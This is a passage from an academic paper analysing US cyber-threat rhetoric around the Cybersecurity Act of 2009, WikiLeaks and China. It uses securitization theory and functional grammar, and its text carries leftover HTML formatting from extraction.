order of magnitude greater’’ than those cased by the physical attack on the World Trade<br />
Center.<br />
These quotes are almost 20 years apart, but the rhetoric rema<strong>in</strong>s the same. Cyberspace is a threat, and<br />
it will replace traditional warfare and be just as lethal, if not more lethal, than k<strong>in</strong>etic weapons. On the<br />
other hand, state adversaries exist side by side with cyber terrorism <strong>in</strong> the cyber rhetoric of the 21st<br />
century. Accord<strong>in</strong>g to Bendrath, the word 'cyber' has often more to do with rhetoric and hidden agendas<br />
than with actual threats (2004).<br />
Bendrath (ibid.) states that media, government officials and <strong>in</strong>telligence agencies create a circle, where<br />
they th<strong>in</strong>k up worst-case scenarios. The same phenomenon was obvious <strong>in</strong> 2009. Rhetorical statements<br />
may land <strong>in</strong> bills and Acts, as was the case with the much-quoted Secur<strong>in</strong>g Cyberspace for the 44th<br />
Presidency report:<br />
America’s failure to protect cyberspace is one of the most urgent national security problems<br />
fac<strong>in</strong>g the new adm<strong>in</strong>istration that will take office <strong>in</strong> January 2009.<br />
The open<strong>in</strong>g phrase of the first draft of the Cybersecurity Act of 2009 is not difficult to recognize:<br />
America’s failure to protect cyberspace is one of the most urgent national security problems<br />
fac<strong>in</strong>g the country.<br />
The only difference is that <strong>in</strong>stead of the adm<strong>in</strong>istration, it is the whole country that is under a threat.<br />
Extend<strong>in</strong>g the threat to the entire country br<strong>in</strong>gs the matter <strong>in</strong>to the doma<strong>in</strong> of government control.<br />
Bendrath (2004) remarks that unlike what was the case with nuclear war dur<strong>in</strong>g the Cold War, an<br />
average citizen can not possibly know whether cyber war is reality or not. When Secur<strong>in</strong>g Cyberspace for<br />
the 44th Presidency states that "In cyberspace, the war has begun", and that "It is a battle we are los<strong>in</strong>g".<br />
The fact is that citizens cannot tell whether attacks and hack<strong>in</strong>g are reality, or whether the alleged parties<br />
are really responsible for them (ibid.).<br />
2.1 "Federal government bears primary responsibility"<br />
Cybersecurity can no longer be relegated to <strong>in</strong>formation technology offices and chief<br />
<strong>in</strong>formation officers. Nor is it primarily a problem for homeland security and counterterrorism.<br />
And it is completely <strong>in</strong>adequate to defer national security to the private sector and the<br />
market. This is a strategic issue on par with weapons of mass destruction and global jihad,<br />
where the federal government bears primary responsibility.<br />
(Secur<strong>in</strong>g Cyberspace for the 44thpresidency)<br />
Cybersecurity Act of 2009 proposes public and private IT-sector cooperation and government control of<br />
the private sector networks. The first draft of the Act also proposed the so-called "kill-switch", which<br />
would have given the president unilateral authority to control (or shut down) access to the <strong>in</strong>ternet without<br />
explanation. This created public debate. The provision was revised, and a year later the Act was<br />
approved and passed to the Senate for consideration. However, the president would still be authorized to<br />
"declare cyber emergency" and decide on its duration. The bill was proposed <strong>in</strong> a congress session, but<br />
did not become law.<br />
The message is clear. The <strong>in</strong>ternet should be controlled, and its control is government responsibility. In<br />
2010, this discussion was more heated than ever, after WikiLeaks published government documents.<br />
Politicians were quick to label Julian Assange a terrorist (James, 2010), and the Pentagon banned the<br />
military the access to WikiLeaks (Scarborough, 2010) while the federal authorities were <strong>in</strong>vestigat<strong>in</strong>g<br />
whether Assange could be charged under the Espionage Act. "This is worse even than a physical attack<br />
on Americans, it’s worse than a military attack," says congressman Peter K<strong>in</strong>g, aga<strong>in</strong> repeat<strong>in</strong>g the<br />
rhetoric of <strong>in</strong>formation as a physical weapon (James, 2010). This rhetoric is the paradox of cyber<br />
discourse.<br />
2.2 "Thousands of people die"<br />
When discuss<strong>in</strong>g cybersecurity, the problem and question is the def<strong>in</strong>ition of cyber warfare. When can a<br />
cyber operation be referred to as cyber war, and what is the difference between cyber terrorism and<br />
164
Saara Jantunen and Aki-Mauri Huht<strong>in</strong>en<br />
cyber sabotage? There may not be any difference between the terms, but it is a matter of word choice<br />
(Kupar<strong>in</strong>en, 2009). The use of the word 'terrorism' is a rhetorical choice.<br />
In the Merriam-Webster's onl<strong>in</strong>e dictionary terrorism is def<strong>in</strong>ed as<br />
1. The calculated use of violence (or the threat of violence) aga<strong>in</strong>st civilians <strong>in</strong> order to atta<strong>in</strong><br />
goals that are political or religious or ideological <strong>in</strong> nature; this is done through <strong>in</strong>timidation or<br />
coercion or <strong>in</strong>still<strong>in</strong>g fear<br />
2. The act of terroriz<strong>in</strong>g, or state of be<strong>in</strong>g terrorized; a mode of government by terror or<br />
<strong>in</strong>timidation.3. The practise of coerc<strong>in</strong>g governments to accede to political demands by<br />
committ<strong>in</strong>g violence on civilian targets; any similar use of violence to achieve goals.<br />
The discussion on the 2007 cyber attacks aga<strong>in</strong>st Estonian targets is an example of the confus<strong>in</strong>g of the<br />
terms 'terrorism' and 'sabotage'. Are attacks aga<strong>in</strong>st onl<strong>in</strong>e services "calculated use of violence"?<br />
This is a question James Lewis (CSIS) asks:<br />
Terrorism requires violence and horror. On September 11th, for example, after a day of<br />
shock<strong>in</strong>g images, riders of Wash<strong>in</strong>gton’s subway system could still smell smoke <strong>in</strong> the<br />
tunnels from the burn<strong>in</strong>g Pentagon. In Estonia’s recent cyber <strong>in</strong>cident, people were unable to<br />
access their bank accounts onl<strong>in</strong>e.<br />
Lewis cont<strong>in</strong>ues by stat<strong>in</strong>g that exaggerations about epic disasters is a way to br<strong>in</strong>g cyber threats <strong>in</strong>to the<br />
public consciousness. However, this did not stop The Telegraph from us<strong>in</strong>g the headl<strong>in</strong>e ”Cyberterrorism<br />
is real - ask Estonia" (30.3.2007). If the attacks aga<strong>in</strong>st Estonian <strong>in</strong>frastructure are considered<br />
cyber terrorism, the def<strong>in</strong>ition of terrorism is different <strong>in</strong> the context of cyber, or, needs to be redif<strong>in</strong>ed. In<br />
order to be properly established, the term needs a clear semantic representation despite its political<br />
nature. The political demand for threat discourse will be discussed <strong>in</strong> the follow<strong>in</strong>g chapter.<br />
3. Threat discourse: Methods for analysis<br />
As the previous chapters have demonstrated, cyber rhetoric is synonymous to threat discourse. This<br />
br<strong>in</strong>gs us <strong>in</strong>to the doma<strong>in</strong> of security analysis. This chapter focuses on br<strong>in</strong>g<strong>in</strong>g together two approaches,<br />
the securitization theory and the functional language theory, which form the backbone of the analysis of<br />
threat discourse. The follow<strong>in</strong>g sections will briefly discuss the relevance of the securitization theory <strong>in</strong><br />
discourse analysis, and br<strong>in</strong>g it together with functional language theory.<br />
3.1 Securitization as discourse<br />
From the perspective of discourse analysis, the securitization theory (Buzan, Waever & de Wilde, 1998)<br />
has three key concepts: the securitiz<strong>in</strong>g actor, the securitiz<strong>in</strong>g move, and the referent object. "A<br />
securitiz<strong>in</strong>g actor is someone, a group, who performs the security speech act" (Ibid: 40). The securitiz<strong>in</strong>g<br />
move is a "discourse that takes the form of present<strong>in</strong>g someth<strong>in</strong>g as an existential threat" (Ibid: 25), and<br />
the referent object is the object existentially threatened and has, at the same time, the "a legitimate claim<br />
to survival" (Ibid: 36). The threats are verbalized through speech acts - threat discourse.<br />
These three elements are the pivotal structures of discourse discourse - which, ironically, typically is<br />
realized as threat discourse. The result of successful securitiz<strong>in</strong>g moves is securitization, which removes<br />
the referent object from the doma<strong>in</strong> of politics and transfers it <strong>in</strong>to "panic politics". This polarizes the<br />
concepts of politicization and securitization (Ibid: 29). If the process of securitization is not successful, the<br />
act should be understood as a securitiz<strong>in</strong>g move (Ibid). All this actualizes through language and<br />
discourse. The structural properties of argumentation support the semantics of the debate.<br />
3.2 What does functional language theory have to offer?<br />
Accord<strong>in</strong>g to functional language theory, language has three functions. They are presented below as <strong>in</strong><br />
Butt (2003):<br />
Ideational (experiential and logical metafunctions)<br />
Interpersonal<br />
Textual<br />
165
Saara Jantunen and Aki-Mauri Huht<strong>in</strong>en<br />
In this study the ideational function is the foundation of the analysis, as it deals with the conceptualiz<strong>in</strong>g<br />
process of language by focus<strong>in</strong>g on the natural world and events, <strong>in</strong>lud<strong>in</strong>g the human consciousness and<br />
language. This function conta<strong>in</strong>s the experiential and logical metafunctions. The logical metafunction<br />
uses our experiences to organize reason<strong>in</strong>g. The experiential metafunction is realized by the transitivity<br />
system, and it deals with our experience and understand<strong>in</strong>g of the world: "It conveys a picture of reality",<br />
and this makes it the ma<strong>in</strong> tool of this analysis. The experiential function answers the question who does<br />
what to whom under what circumstance, the Process be<strong>in</strong>g the core element of the question.<br />
Accord<strong>in</strong>g to Halliday (2004: 170-172), a clause is not only a flow of action, but a mode of reflection that<br />
imposes endless variation as well as flow of events by a system of transitivity. A clause typically consists<br />
of the follow<strong>in</strong>g components (Halliday, 2004: 175):<br />
Process<br />
Participants (<strong>in</strong>volved <strong>in</strong> the Process)<br />
Circumstance (associated with the Process)<br />
As demonstrated above, all elements of the clause are tied to the process. The transitivity system<br />
conta<strong>in</strong>s the idea that 1) a clause is a process <strong>in</strong> which 2) some th<strong>in</strong>gs/events function as participants,<br />
who, simply put, either do/act/happen, or are targets of do<strong>in</strong>g/act<strong>in</strong>g/happen<strong>in</strong>g. The system construes<br />
experience <strong>in</strong>to process types: material, behavioral, mental, verbal, relational and existential. These<br />
process types are realized by verbal groups. Nom<strong>in</strong>al groups represent participants, and adverbial<br />
groups circumstance.<br />
Table 1: Examples of clause elements<br />
Participant Process Target Circumstance<br />
MATERIAL They attacked us viciously.<br />
Participant Process Attribute<br />
RELATIONAL They are wonderful men and<br />
women<br />
This discussion on the role of processes (verbs) and their significance functions as an argument for the<br />
method of analysis. The choice of process type <strong>in</strong> discourse is used to create representations of events,<br />
objects and phenomena around us. In addition, the presence or the absence of clause elements is<br />
perception management of sorts. We can describe th<strong>in</strong>gs to be done or simply to happen, without any<br />
reference to the doer ot the object of action. This is exactly what the transitivity system<br />
Luk<strong>in</strong> (2005) demonstrates the function of the transitivity system <strong>in</strong> military discourse. She discusses the<br />
aspect of "do<strong>in</strong>g without do<strong>in</strong>g to" <strong>in</strong> war rhetoric, a tactic of "mut<strong>in</strong>g" action.<br />
Table 2: Examples of actor+process configurations, from Luk<strong>in</strong>, 2005: 7<br />
Actor Process (circumstantial processes)<br />
The operation began on the 19th of March<br />
Our forces are operat<strong>in</strong>g throughout Iraq<br />
Decisive precision shock began last night<br />
In the above examples the omission of the target of action functions as a tool for perception<br />
management. Leav<strong>in</strong>g out clause elements, <strong>in</strong> this case the object/target of military action, creates a<br />
narrative of 'happen<strong>in</strong>gs' rather than actions: "The attacks occured with effectiveness" but not We<br />
attacked effectively. The manipulation of clause elements could be called 'grammatical tactics' <strong>in</strong> threat<br />
discourse.<br />
Sometimes Processes turn <strong>in</strong>to Participants. This process is called nom<strong>in</strong>alization. In functional grammar,<br />
nom<strong>in</strong>alizations can be understood as metaphors (Butt, 2003: 74). Through nom<strong>in</strong>alization, an action<br />
turns <strong>in</strong>to a concept. The open<strong>in</strong>g clause of the Cybersecurity Act of 2009 is a good example:<br />
Nom<strong>in</strong>alization: America’s failure to protect cyberspace is one of the most urgent national security<br />
problems fac<strong>in</strong>g the country.<br />
166
Saara Jantunen and Aki-Mauri Huht<strong>in</strong>en<br />
The nom<strong>in</strong>alization can be compared to a clause with a Participant +Process configuration:<br />
Process description: America has failed to protect cyberspace.<br />
When Process forms <strong>in</strong>to a Participant, the "event has become an object and the language is no longer<br />
congruent with our experience" (Butt, 2003: 75).<br />
The upcom<strong>in</strong>g analysis will further analyze the evaluative patterns of the data. The action descriptions<br />
can be categorized accord<strong>in</strong>g to their evaluative function. Mart<strong>in</strong> & White (2005) argue there are three<br />
semantic categories for express<strong>in</strong>g attitude. These express positive or negative ways of feel<strong>in</strong>g (Attitude),<br />
our attitudes towards people and how they behave (Judgement), and our evaluations of the worth of<br />
th<strong>in</strong>gs and phenomena around us (Appreciation):<br />
Table 3: Types of attitude<br />
Attitude Affect Judgement Appreciation<br />
Variables un/happ<strong>in</strong>ess, <strong>in</strong>/security,<br />
dis/satisfaction<br />
Social esteem: normality,<br />
capacity, tenacity<br />
Behavior wail, trust, condemn<br />
Social sanction: veracity,<br />
propriety<br />
perform, fail, depend<br />
deceive, abide<br />
reaction, composition,<br />
valuation<br />
bore, help<br />
Whereas the securitization theory discussed <strong>in</strong> the previous section does not provide tools for the<br />
structural analysis of the securitiz<strong>in</strong>g move, the functional language theory offers a method for<br />
determ<strong>in</strong><strong>in</strong>g the representation of 'self' or 'the other' <strong>in</strong> discourse. This is the key to analyz<strong>in</strong>g threat<br />
discourse. The follow<strong>in</strong>g chapter is dedicated to two analyzes: the first analysis deals with the properties<br />
of the securitization narrative, and the second analysis discusses the l<strong>in</strong>guistic patterns and semantic<br />
dimension of cyber discourse.<br />
4. Analysis: Cyber, censorship and securitization<br />
This chapter focuses on two aspects of language and discourse. First, a brief analysis of the WikiLeaks<br />
discussion will discuss the narrative patterns of cyber/<strong>in</strong>formation security. This will act as an <strong>in</strong>troduction<br />
to threat/cyber discourse and provide examples of securitiz<strong>in</strong>g moves. After that, the structural and<br />
evaluative properties of threat discourse are approached through the analysis of cyber discourse.<br />
4.1 Threat discourse as a narrative: WikiLeaks <strong>in</strong> the media<br />
WikiLeaks ga<strong>in</strong>ed wide <strong>in</strong>ternational publicity when it published video material leaked by someone <strong>in</strong> the<br />
U.S. military. These videos were recorded dur<strong>in</strong>g helicopter operations <strong>in</strong> Iraq. The one that caused most<br />
controversy, published by WikiLeaks by the name Collateral Murder, shows the shoot<strong>in</strong>g of a group of<br />
men and later civilians who stopped to help the wounded and killed, who later turned out to be journalists<br />
and photographers. The disproportionate use of force (among other munitions, Hellfire missiles were<br />
employed) and the arrogant and mock<strong>in</strong>g comments of the crew caused public outrage. The comments<br />
"Come on, let us shoot!" and "Oh yeah, look at those dead bastards" can be heard on the video.<br />
WikiLeaks kept publish<strong>in</strong>g controversial material, and <strong>in</strong> November 2010 it released a massive number of<br />
diplomatic cables. WikiLeaks founder, Julian Assange, gave a number of selected journalists access to<br />
the material. He said that the massive amount of <strong>in</strong>formation was too much for them to research, so<br />
journalists, as professionals, would be the right people to research the material, remove any details that<br />
would endanger for example civilian collaborators, and to report their analysis <strong>in</strong> the media (Wikirebels,<br />
2010).<br />
The publish<strong>in</strong>g immediately enraged a number of politicians <strong>in</strong> the U.S. and elsewhere. Assange's<br />
actions were quickly not only condemned, but referred to as acts of 'terror'. Secretary of State Hillary<br />
Rodham Cl<strong>in</strong>ton stated that the actions of WikiLeaks "tear at the fabric" of responsible government, and<br />
are an attack on not only America, but on <strong>in</strong>ternational community. Tom Flanagan, a Canadian former<br />
presidential advisor, suggested President Obama should have Assange assass<strong>in</strong>ated (Coll<strong>in</strong>s, 2010).<br />
Sarah Pal<strong>in</strong> demanded WikiLeaks should be hunted like al-Qaeda (Beckford, 2010). Politicians were<br />
167
Saara Jantunen and Aki-Mauri Huht<strong>in</strong>en<br />
quick to compare Wikileaks to terrorists: Congressman Peter K<strong>in</strong>g wrote to Cl<strong>in</strong>ton that "WikiLeaks<br />
engaged <strong>in</strong> terrorist activity by committ<strong>in</strong>g acts that it knew, or reasonably should have known, would<br />
afford material support for the commission of terrorist activity" (Pillifant, 2010).<br />
Cl<strong>in</strong>ton has emphasized the roles of free <strong>in</strong>formation and transparency. In her speech on <strong>in</strong>ternet<br />
freedom she cites President Obama (Council on Foreign Relations, 2010):<br />
Dur<strong>in</strong>g his visit to Ch<strong>in</strong>a <strong>in</strong> November, President Obama held a town hall meet<strong>in</strong>g with an<br />
onl<strong>in</strong>e component to highlight the importance of the <strong>in</strong>ternet. In response to a question that<br />
was sent <strong>in</strong> over the <strong>in</strong>ternet, he defended the right of people to freely access <strong>in</strong>formation,<br />
and said that the more freely <strong>in</strong>formation flows, the stronger societies become. He spoke<br />
about how access to <strong>in</strong>formation helps citizens to hold their governments accountable,<br />
generates new ideas, and encourages creativity. The United States' belief <strong>in</strong> that truth is<br />
what br<strong>in</strong>gs me here today.<br />
A year later, after the publish<strong>in</strong>g of the diplomatic cables, Cl<strong>in</strong>ton's rhetoric had thus changed, but the<br />
WikiLeaks website declared their mission is transparency (Schmitt, 2010):<br />
All governments can benefit from <strong>in</strong>creased scrut<strong>in</strong>y by the world community, as well as their<br />
own people. We believe this scrut<strong>in</strong>y requires <strong>in</strong>formation.<br />
What ever the truth beh<strong>in</strong>d the leaked documents, from the perspective of securitization it is the logic of<br />
argumentation that <strong>in</strong>terests us. The status of freedom of speech as an <strong>in</strong>trisic value and as the<br />
foundation of Western culture suffered a blow. WikiLeaks, embodied by Julian Assange, was accused of<br />
threaten<strong>in</strong>g national security. The <strong>in</strong>itial leaker and the newspapers that published leaked material have a<br />
m<strong>in</strong>or role <strong>in</strong> the threat discourse. The press enjoys freedom of press, but the <strong>in</strong>ternet as a medium<br />
clearly does not enjoy the same freedom. Information is referred to as a "bomb" (Wikirebels, 2010) when<br />
it is onl<strong>in</strong>e.<br />
Obviously it is not the <strong>in</strong>formation that is the problem. Accord<strong>in</strong>g to Secretary of Defence Gates, the<br />
publication of the cables was merely embarrass<strong>in</strong>g (U.S. Department of Defense, 2010). It is the fact that<br />
this <strong>in</strong>formation is published onl<strong>in</strong>e that is seen as a threat.<br />
4.2 Structures and evaluations of threat discourse: Ch<strong>in</strong>a and cyberspace<br />
In this section, threat discourse is approached through Process analysis, mean<strong>in</strong>g descriptions of action<br />
and be<strong>in</strong>g. The data comes from a number of American white papers on cyber security: The<br />
Cybersecurity Act of 2009, Secur<strong>in</strong>g Cyberspace for the 44th Presidency, and the 2008 report to<br />
Congress by the Ch<strong>in</strong>a Economic and <strong>Security</strong> Review Commission.<br />
In American cyber discourse the threat types can be divided <strong>in</strong>to three categories. The most prom<strong>in</strong>ent<br />
one of them is military threat. This is verbalized with enemy action descriptions as follows:<br />
Operate through foreign nations’ military or <strong>in</strong>telligence-gather<strong>in</strong>g operations<br />
Physical threat is the other ma<strong>in</strong> threat type. This category conta<strong>in</strong>s descriptions of enemy action such as<br />
attack<strong>in</strong>g/<strong>in</strong>fluenc<strong>in</strong>g/manipulat<strong>in</strong>g critical <strong>in</strong>frastructure and networks that may affect people's lives and<br />
well-be<strong>in</strong>g:<br />
Disrupt telecommunications, electrical power, energy pipel<strong>in</strong>es, ref<strong>in</strong>eries, f<strong>in</strong>ancial networks, and<br />
other critical <strong>in</strong>frastructures<br />
The third ma<strong>in</strong> category of threat descriptions deals with the status of the U.S as a f<strong>in</strong>ancial superpower:<br />
Have easy access to military technology, <strong>in</strong>tellectual property of lead<strong>in</strong>g companies, and government<br />
data<br />
By categoriz<strong>in</strong>g the Process types of enemy action descriptions, it is easy to see the narrative. Accord<strong>in</strong>g<br />
to the reports, Ch<strong>in</strong>ese hackers are described as a threat to the critical <strong>in</strong>frastructure (which culm<strong>in</strong>ates to<br />
the citizens <strong>in</strong> their own homes), to corporations through <strong>in</strong>dustrial espionage, and to the entire nation<br />
through the loom<strong>in</strong>g, full scale cyber war.<br />
The follow<strong>in</strong>g sections will discuss the categorization of data <strong>in</strong>to Process types, as well as their<br />
evaluation types.<br />
168
4.2.1 Enemy capacity<br />
Saara Jantunen and Aki-Mauri Huht<strong>in</strong>en<br />
Descriptions of enemy capacity are the core of the data. They are high modality threat descriptions. The<br />
follow<strong>in</strong>g data are examples of how Ch<strong>in</strong>a's actions are described:<br />
Table 4: Descriptions of capacity<br />
ga<strong>in</strong> access<br />
and view<br />
cont<strong>in</strong>ue to<br />
develop and<br />
field<br />
protected data or<br />
cause <strong>in</strong>frastructure<br />
components to<br />
operate <strong>in</strong> an<br />
irregular manner<br />
disruptive military<br />
technologies<br />
have implications beyond<br />
the Asia-Pacific<br />
region<br />
can engage <strong>in</strong> forms of cyber<br />
warfare so<br />
sophisticated<br />
material, material Judgment: social esteem:<br />
capacity (negative<br />
evaluation)<br />
material Judgment: social esteem:<br />
capacity (negative<br />
evaluation)<br />
relational possessive Judgment: social esteem:<br />
capacity (negative<br />
material (relational<br />
possessive)<br />
evaluation)<br />
Judgment: social esteem:<br />
capacity (negative<br />
evaluation)<br />
can access the NIPRNet material Judgment: social esteem:<br />
capacity (negative<br />
evaluation)<br />
A typical action descriptions is a material process, which aims to highlight the adversary's capability,<br />
resources and tra<strong>in</strong><strong>in</strong>g to wage war <strong>in</strong> cyberspace. Obviously, these are also attributes that are desirable<br />
for every nation's military. Although there are a number of descriptions that conta<strong>in</strong> moral evaluation, the<br />
context of war normalizes them to capacity descriptions. The descriptions are evaluated as 'negative<br />
capacity':<br />
Table 5: Capacity vs. propriety<br />
have been able to penetrate poorly protected U.S. computer networks material Judgment: social<br />
esteem: capacity<br />
(negative<br />
evaluation)<br />
Penetrat<strong>in</strong>g U.S. networks could be evaluated, depend<strong>in</strong>g on the context, as crim<strong>in</strong>al or immoral, but the<br />
description conta<strong>in</strong>s the clear message that the enemy is resourceful and skilled, and ready to use their<br />
skills if it is militarily necessary.<br />
4.2.2 Enemy affect<br />
The enemy is not described with the mental process type much, but rhetorically the use of this Process<br />
type is significant.<br />
Table 6: Mental processes<br />
believe the United States already is<br />
carry<strong>in</strong>g out offensive cyber<br />
espionage and exploitation<br />
aga<strong>in</strong>st Ch<strong>in</strong>a<br />
mental Affect: <strong>in</strong>security<br />
believe that <strong>in</strong> many cases a<br />
vulnerable U.S. system<br />
could be unplugged <strong>in</strong><br />
anticipation of a cyber<br />
attack.<br />
mental Affect: security<br />
believe the United States is<br />
dependent on <strong>in</strong>formation<br />
technology<br />
mental Affect: security<br />
believe there is a first mover<br />
mental Judgment: social<br />
advantage <strong>in</strong> both<br />
conventional and cyber<br />
operations aga<strong>in</strong>st the<br />
United States<br />
esteem: capacity<br />
169
Saara Jantunen and Aki-Mauri Huht<strong>in</strong>en<br />
Interpret<strong>in</strong>g the beliefs or th<strong>in</strong>k<strong>in</strong>g of someone else is always a rhetorical tool. Here the context<br />
emphasizes this fact. First, it is told that Ch<strong>in</strong>a considers cyber war as defence. Then, it is stated that<br />
Ch<strong>in</strong>a already believes the U.S. "already is carry<strong>in</strong>g out offensive cyber espionage". In other words,<br />
Ch<strong>in</strong>a believes cyber attacks are necessary right this moment. This argument conta<strong>in</strong>s the only action<br />
description that signals <strong>in</strong>security for Ch<strong>in</strong>a's part. The outcome is threat descourse: Ch<strong>in</strong>a feels<br />
threatened and may attack any moment.<br />
4.2.3 Propriety<br />
Evaluat<strong>in</strong>g the propriety of the adversary may be the oldest tradition of war rhetoric and <strong>in</strong>formation<br />
warfare. The data of this study is exceptional <strong>in</strong> the sense that the propriety of the adversary is<br />
aggressively demonized. Instead of describ<strong>in</strong>g the adversary as brutal monsters, the enemy identity is<br />
compiled of descriptions of trecherous, skilled strangers, who act aga<strong>in</strong>st the U.S. and affect the<br />
everyday lives of its citizens. Sometimes mak<strong>in</strong>g a difference between the descriptions of capacity and<br />
propriety is difficult, as what is capacity for the enemy, may appear (and often is argumented) as<br />
someth<strong>in</strong>g immoral and cheap to 'us'.<br />
Table 7: Propriety<br />
disrupt telecommunications, electrical power,<br />
material Judgment: social<br />
energy pipel<strong>in</strong>es, ref<strong>in</strong>eries, f<strong>in</strong>ancial<br />
sanction: propriety<br />
networks, and other critical<br />
<strong>in</strong>frastructures<br />
(negative evaluation)<br />
have connections to terrorist groups relational possessive Judgment: social<br />
sanction: propriety<br />
(negative evaluation)<br />
are target<strong>in</strong>g our <strong>in</strong>formation systems and<br />
material Judgment: social<br />
<strong>in</strong>frastructure for exploitation and<br />
sanction: propriety<br />
potential disruption or destruction<br />
(negative evaluation)<br />
have other terrible th<strong>in</strong>gs they can do to us relational possessive Judgment: social<br />
sanction: propriety<br />
(negative evaluation)<br />
Here, the nature of war dist<strong>in</strong>guishes the two: descriptions of military action are <strong>in</strong>terpreted as<br />
descriptions of capacity, and attacks aga<strong>in</strong>st civilians or civilian <strong>in</strong>frastructures are <strong>in</strong>terpreted as moral<br />
judgment.<br />
4.2.4 Nom<strong>in</strong>al structures<br />
The follow<strong>in</strong>g examples illustrate how a nom<strong>in</strong>al structure encapsulates the action and creates a 'brand'<br />
or a concept. Below, the examples conta<strong>in</strong> nom<strong>in</strong>al structures used to refer to 'us' and 'them':<br />
Table 8: Nom<strong>in</strong>alizations 'us' vs. 'them'<br />
'US' the adequacy of exist<strong>in</strong>g legal authorities Judgement: social esteem: capacity<br />
the <strong>in</strong>capacity or destruction of such<br />
systems and assets<br />
Judgement: social esteem: capacity<br />
the vulnerability of U.S. <strong>in</strong>frastructures Judgement: social esteem: capacity<br />
Our lack of cyber security Judgement: social esteem: capacity<br />
'TH Ch<strong>in</strong>a’s developments <strong>in</strong> these areas Judgement: social esteem: capacity<br />
EM' the natural progression of those wish<strong>in</strong>g to<br />
harm U.S. security <strong>in</strong>terests<br />
Judgement: social sanction: propriety<br />
violent extremism <strong>in</strong> support of a radically<br />
different world-view<br />
Judgement: social sanction: propriety<br />
the emergence of powerful new state<br />
competitors<br />
Judgement: social esteem: capacity<br />
The nom<strong>in</strong>al structures referr<strong>in</strong>g to 'self' express lack of capacity, whereas the adversary is described as<br />
threaten<strong>in</strong>g due to their capacity. These nom<strong>in</strong>al structures summarize the essence of the data. They are<br />
nom<strong>in</strong>alized action descriptions that encapsulate the threat discourse. A quick look at them tells the<br />
reader what the discourse focuses on: the development and progression of the adversary, and the<br />
vulnerability of the U.S.<br />
5. Conclusion<br />
As stated earlier, cyber discourse is a synonym to threat discourse. As cyber is conceptualized through<br />
threat descriptions, it is natural that it, as a doma<strong>in</strong>, is caught <strong>in</strong> between the military and the civilian<br />
170
Saara Jantunen and Aki-Mauri Huht<strong>in</strong>en<br />
world. The militarization of cyber discourse refects a certa<strong>in</strong> political agenda. When the word "cyber" is<br />
uttered, people immediately th<strong>in</strong>k of security. In this sense, the securitization has been successful. The<br />
debates about Ch<strong>in</strong>a's cyber capability or WikiLeaks are narratives with<strong>in</strong> this threat discourse.<br />
Accord<strong>in</strong>g to the narratives researched <strong>in</strong> this article, the <strong>in</strong>ternet is not seen as a medium among others.<br />
Instead, while recogniz<strong>in</strong>g its place as a medium for <strong>in</strong>formation shar<strong>in</strong>g, it is seen as a battle space.<br />
Even if the <strong>in</strong>formation, was available both onl<strong>in</strong>e and through the press, only <strong>in</strong>ternet censorship is<br />
called for.<br />
The security (or threat) discourse about cyberspace stems from its unclear status. Either cyberspace is<br />
recognized as a public <strong>in</strong>formation environment, or it is militarized <strong>in</strong>to a dual-use weapon, which will<br />
primarily function as a regulated medium and essentially as a battle space. The outcome of the power<br />
struggle over <strong>in</strong>ternet authority will decide.<br />
References<br />
Beckford, M. (2010) 'Sarah Pal<strong>in</strong>: hunt WikiLeaks founder like al-Qaeda and Taliban leaders', The Telegraph, 30 Nov<br />
[Onl<strong>in</strong>e] Available: http://www.telegraph.co.uk/news/worldnews/wikileaks/ 8171269/Sarah-Pal<strong>in</strong>-hunt-WikiLeaksfounder-like-al-Qaeda-and-Taliban-leaders.html<br />
[30 Jan 2011]<br />
Bendrath, R. (2003) The American Cyber-Angst and the Real World - Any L<strong>in</strong>k?. In Latham, R. (Ed.) Bombs and<br />
Bandwidth: The emerg<strong>in</strong>g relationship between <strong>in</strong>formation technology and security, New York: The New Press.<br />
Buzan, B., Waever, O. and De Wilde, J. (1998) <strong>Security</strong>: A new framework for analysis, London: Lynne Rienner<br />
Publishers.<br />
Center for Strategic and International Studies (CSIS)(2008) Secur<strong>in</strong>g Cyberspace for the 44th Presidency,<br />
Wash<strong>in</strong>ton, DC.<br />
Ch<strong>in</strong>a Economic and <strong>Security</strong> Review Commission (2008) 2008 Report to Congress. Wash<strong>in</strong>gton, U.S. Government<br />
pr<strong>in</strong>t<strong>in</strong>g Office.<br />
Coll<strong>in</strong>s, N. (2010) 'WikiLeaks: guilty parties 'should face death penalty'', The Telegraph, 1 Dec<br />
[Onl<strong>in</strong>e] Available: http://www.telegraph.co.uk/news/worldnews/wikileaks/8172916/ WikiLeaks-guilty-parties-shouldface-death-penalty.html<br />
[30 Jan 2011]<br />
Council on Foreign Relations (2010) 'Cl<strong>in</strong>ton's Speech on Internet Freedom, January 2010' [Onl<strong>in</strong>e] Available:<br />
http://www.cfr.org/publication/21253/cl<strong>in</strong>tons_speech_on_<strong>in</strong>ternet_freedom_january_ 2010.html [30 Jan 2011]<br />
Halliday, M.A.K. (2004) An <strong>in</strong>troduction to functional grammar, 3rd edition. Revised by M.I.M. Mathiessen, London:<br />
Arnold.<br />
James, F. (2010) 'WikiLeaks Is A Terror Outfit: Rep. Peter K<strong>in</strong>g', NPR, 29 Nov [Onl<strong>in</strong>e] Available:<br />
http://www.npr.org/blogs/itsallpolitics/2010/11/29/131664547/wikileaks-is-a-terror-outfit-rep-peter-k<strong>in</strong>g<br />
Kupar<strong>in</strong>en, V-P. (2009) Interview with the director, 25 August 2009. National emergency supply agency, Hels<strong>in</strong>ki:<br />
Author.<br />
Luk<strong>in</strong>, A. (2005) 'Information warfare: the grammar of talk<strong>in</strong>g war', Social Alternatives, Vol 24 No. 1, First Quarter, pp.<br />
5-10.<br />
Lewis, J.A. (2007) 'There’s No Such Th<strong>in</strong>g As Cyberterror', Atlantic Community, 25 July [Onl<strong>in</strong>e] Available:<br />
http://www.atlanticcommunity.org/<strong>in</strong>dex/Open_Th<strong>in</strong>k_ Tank<br />
_Article/There%27s_No_Such_Th<strong>in</strong>g_As_Cyberterror [30 Jan 2011]<br />
Mart<strong>in</strong>, J.R. and White, P.R.R. (2005) The language of evaluation: Appraisal <strong>in</strong> English, New York: Palgrave<br />
Macmillan.<br />
Pillifant, R. (2010) 'Peter K<strong>in</strong>g On Why Wikileaks Should Be Declared A Terrorist Organization [Video]', The New<br />
York Observer, 29 Nov [Onl<strong>in</strong>e] Available: http://www.observer.com/2010/ politics/peter-k<strong>in</strong>g-why-wikileaksterrorist-organization<br />
[30 Jan 2011]<br />
Scarborough, R. (2010) 'Military ordered to stay off WikiLeaks', 6 Aug [Onl<strong>in</strong>e] Available:<br />
